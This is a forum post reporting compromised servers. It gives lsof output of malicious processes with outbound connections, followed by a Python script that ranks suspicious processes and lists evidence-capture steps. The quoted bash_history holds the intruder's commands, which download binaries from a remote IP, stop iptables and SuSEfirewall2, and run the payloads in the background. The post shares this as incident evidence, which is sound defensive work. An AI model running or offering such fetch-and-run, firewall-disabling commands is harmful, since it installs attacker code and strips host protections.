Security Problem: Server Violated

yena

Nov 18, 2011
Hello, I have several servers violated, root escalation.

Some details:

----------------------------------------------------------------
root@prx:/home/enrico# lsof -p 361304
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
503 361304 root cwd DIR 0,25 4096 173550103 /var/lib/vz/root/301/root
503 361304 root rtd DIR 0,25 4096 173280478 /var/lib/vz/root/301
503 361304 root txt REG 0,25 1312292 173551473 (deleted)/var/lib/vz/root/301/root/503
503 361304 root mem REG 253,2 173551473 (deleted)/var/lib/vz/root/301/root/503 (stat: No such file or directory)
503 361304 root 0u sock 0,6 0t0 28144031 can't identify protocol
503 361304 root 1u IPv4 28144067 0t0 TCP 83-103-59-172.ip.fastwebnet.it:51503->23.234.50.12:25003 (ESTABLISHED)
503 361304 root 2u raw 0t0 28186896 00000000:00FF->00000000:0000 st=07
root@prxcmc:/home/enrico#
---------------------------------------------------------------------
root@prx:/home/enrico# lsof -p 361321
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
04 361321 root cwd DIR 0,25 4096 173550103 /var/lib/vz/root/301/root
04 361321 root rtd DIR 0,25 4096 173280478 /var/lib/vz/root/301
04 361321 root txt REG 0,25 1223123 173551472 /var/lib/vz/root/301/root/04
04 361321 root mem REG 253,2 173551472 /var/lib/vz/root/301/root/04 (path dev=0,25)
04 361321 root 0u CHR 1,3 0t0 1444042 /var/lib/vz/root/301/dev/null
04 361321 root 1u CHR 1,3 0t0 1444042 /var/lib/vz/root/301/dev/null
04 361321 root 2u CHR 1,3 0t0 1444042 /var/lib/vz/root/301/dev/null
04 361321 root 3u REG 0,25 5 173408660 /var/lib/vz/root/301/tmp/gates.lod
04 361321 root 4u IPv4 28144377 0t0 TCP 83-103-59-172.ip.fastwebnet.it:56004->23.234.50.12:25004 (ESTABLISHED)
04 361321 root 5u raw 0t0 28144451 00000000:0011->00000000:0000 st=07
root@prxcmc:/home/enrico#
--------------------------------------------------------------------------------

Some bash_history log:

wget http://111.74.239.61:8080/503
wget http://111.74.239.61:8080/04
chmod 0755 /root/503
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
nohup /root/503 > /dev/null 2>&1 &
chmod 0755 /root/04
chmod 0755 /root/04
nohup /root/04 > /dev/null 2>&1 &
-------------------------------------------------------------

A binary named 04 in the /root dir is created:

lsof -p 23462
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
04 23462 root cwd DIR 0,20 17 11822 /root
04 23462 root rtd DIR 0,20 24 4 /
04 23462 root txt REG 0,20 1223123 72192 /root/04 (deleted)
04 23462 root 0u CHR 1,3 0t0 6 /dev/null
04 23462 root 1u CHR 1,3 0t0 6 /dev/null
04 23462 root 2u CHR 1,3 0t0 6 /dev/null
04 23462 root 3uW REG 0,20 5 72194 /tmp/gates.lod (deleted)

-----------------------------------------------------------------------------------------------

Does someone have the same experience as me?
Now I'm trying to clean manually...

Thanks
Enrico
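The `lsof` listings above carry the three signals a responder would key on: a running process whose executable has been unlinked (`txt ... (deleted)`), established outbound TCP sessions to a fixed remote port, and an open raw socket, plus a file kept open under `/tmp`. The script below is an added triage example written for this thread, not code from the poster or from Proxmox. It parses `lsof -p` style text, scores each PID on those signals and lists the `/proc/<pid>/exe` capture steps to run before killing anything, since the on-disk binary is already gone. The sample listing is constructed to mirror the post (with a documentation address in place of the real remote host), and the score weights and the `/evidence` path are assumptions for the example.

```python
"""Triage helper for `lsof -p` output: flag processes that combine a deleted
executable, outbound TCP sessions, raw sockets and open files under /tmp."""
import re
from dataclasses import dataclass, field

# Constructed sample modelled on the lsof output quoted in the post; the
# remote endpoint 198.51.100.10 is a documentation address, not the poster's IoC.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
04 23462 root cwd DIR 0,20 17 11822 /root
04 23462 root rtd DIR 0,20 24 4 /
04 23462 root txt REG 0,20 1223123 72192 /root/04 (deleted)
04 23462 root 0u CHR 1,3 0t0 6 /dev/null
04 23462 root 3uW REG 0,20 5 72194 /tmp/gates.lod (deleted)
04 23462 root 4u IPv4 28144377 0t0 TCP host.example:56004->198.51.100.10:25004 (ESTABLISHED)
04 23462 root 5u raw 0t0 28144451 00000000:0011->00000000:0000 st=07
sshd 1234 root cwd DIR 0,20 4096 2 /
sshd 1234 root txt REG 0,20 800000 5000 /usr/sbin/sshd
sshd 1234 root 3u IPv4 12345 0t0 TCP host.example:22->198.51.100.20:50000 (ESTABLISHED)
"""

ESTABLISHED_RE = re.compile(r"->(\S+)\s+\(ESTABLISHED\)")
TMP_RE = re.compile(r"(\S*/tmp/\S+)")


@dataclass
class ProcessFinding:
    pid: int
    command: str
    user: str
    deleted_exe: bool = False
    remote_endpoints: list = field(default_factory=list)
    raw_sockets: int = 0
    tmp_files: list = field(default_factory=list)

    def score(self) -> int:
        # Weights are an assumption for this example, not a published rule.
        return (3 * self.deleted_exe + 2 * self.raw_sockets
                + len(self.remote_endpoints) + len(self.tmp_files))

    def reasons(self) -> list:
        out = []
        if self.deleted_exe:
            out.append("executable unlinked from disk while still running")
        if self.raw_sockets:
            out.append(f"{self.raw_sockets} raw socket(s) open")
        out += [f"established TCP session to {ep}" for ep in self.remote_endpoints]
        out += [f"open file under /tmp: {p}" for p in self.tmp_files]
        return out


def triage(lsof_text: str) -> dict:
    """Map PID -> ProcessFinding built from every row of the listing."""
    findings = {}
    for line in lsof_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] == "COMMAND":
            continue  # header or malformed row
        command, pid, user, fd, ftype = parts[0], int(parts[1]), parts[2], parts[3], parts[4]
        rest = " ".join(parts[5:])  # DEVICE may be absent (raw rows), so keep the tail as text
        f = findings.setdefault(pid, ProcessFinding(pid, command, user))
        if fd == "txt" and "(deleted)" in rest:
            f.deleted_exe = True
        elif ftype in ("IPv4", "IPv6"):
            m = ESTABLISHED_RE.search(rest)
            if m:
                f.remote_endpoints.append(m.group(1))
        elif ftype == "raw":
            f.raw_sockets += 1
        elif ftype == "REG":
            m = TMP_RE.search(rest)
            if m:
                f.tmp_files.append(m.group(1))
    return findings


def suspicious(lsof_text: str, threshold: int = 3) -> list:
    """PIDs whose score reaches the threshold, highest score first."""
    hits = [f for f in triage(lsof_text).values() if f.score() >= threshold]
    return [f.pid for f in sorted(hits, key=lambda f: -f.score())]


def preservation_steps(pid: int, evidence_dir: str = "/evidence") -> list:
    """Shell commands that capture the still-mapped image of an unlinked
    executable via /proc before the process is terminated."""
    return [
        f"mkdir -p {evidence_dir}",
        f"cp /proc/{pid}/exe {evidence_dir}/{pid}.bin",
        f"sha256sum {evidence_dir}/{pid}.bin > {evidence_dir}/{pid}.sha256",
        f"tr '\\0' ' ' < /proc/{pid}/cmdline > {evidence_dir}/{pid}.cmdline",
        f"ls -l /proc/{pid}/cwd /proc/{pid}/exe > {evidence_dir}/{pid}.links",
    ]


if __name__ == "__main__":
    findings = triage(SAMPLE_LSOF)
    for pid in suspicious(SAMPLE_LSOF):
        f = findings[pid]
        print(f"PID {pid} ({f.command}, user {f.user}) score={f.score()}")
        for reason in f.reasons():
            print("  -", reason)
        for cmd in preservation_steps(pid):
            print("  $", cmd)
```

On the host this would be fed `lsof -p <pid>` output for each PID of interest (or `lsof -n` for the whole box); the `sshd` row in the sample shows why a single established session alone stays below the threshold, while the combination of an unlinked binary, a raw socket and a `/tmp` handle ranks the `04` process first. For a compromised container like `/var/lib/vz/root/301`, the `/tmp/` match still fires because the regex accepts any prefix before `/tmp/`.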